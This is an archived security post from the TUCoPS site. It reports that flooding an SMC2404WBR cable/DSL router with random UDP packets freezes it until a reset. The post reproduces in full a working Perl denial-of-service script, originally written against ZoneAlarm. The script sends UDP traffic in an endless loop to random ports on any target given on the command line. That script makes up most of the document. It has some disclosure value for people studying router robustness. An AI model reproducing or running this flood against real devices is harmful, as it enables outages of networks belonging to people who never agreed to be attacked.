TUCoPS :: Network Appliances :: bt1218.txt

SMC Router Denial of Service exploit




Howdy,



Tested on an SMC2404WBR - BarricadeT Turbo 11/22 Mbps Wireless Cable/DSL

Broadband Router.



Sending a stream of UDP random packets to multiple ports 0-65000 on the

router will cause the router to freeze until a soft reset is performed on

it.  In one case, the router did survive but did not come back "alive" for

around 15 minutes.  All other tries (2 others) the router had to be reset.

This attack was performed using the Zonealarm+Windows 98 DoS code written by

_6mO_HaCk.



The code follows:

-----------------snip---------------------



#!/usr/bin/perl

use Socket;



system(clear);

print "\n";

print "--- ZoneAlarm Remote DoS Xploit\n";

print "---\n";

print "--- Discovered & Coded By _6mO_HaCk\n";

print "\n";

if(!defined($ARGV[0]))

{

   &usage

}



my ($target);

 $target=$ARGV[0];



my $ia = inet_aton($target) || die ("[-] Unable to resolve

$target");



socket(DoS, PF_INET, SOCK_DGRAM, 17);

    $iaddr = inet_aton("$target");



print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";



for (;;) {

 $size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x

$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x

$rand x $rand;

 $port=int(rand 65000) +1;

 send(DoS, 0, $size, sockaddr_in($port, $iaddr));

}

sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}

-----------------------snip--------------------------------------



Dave, put down the Windows disk Dave.  Dave?  DAVE?!!?  - Hal9000











TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH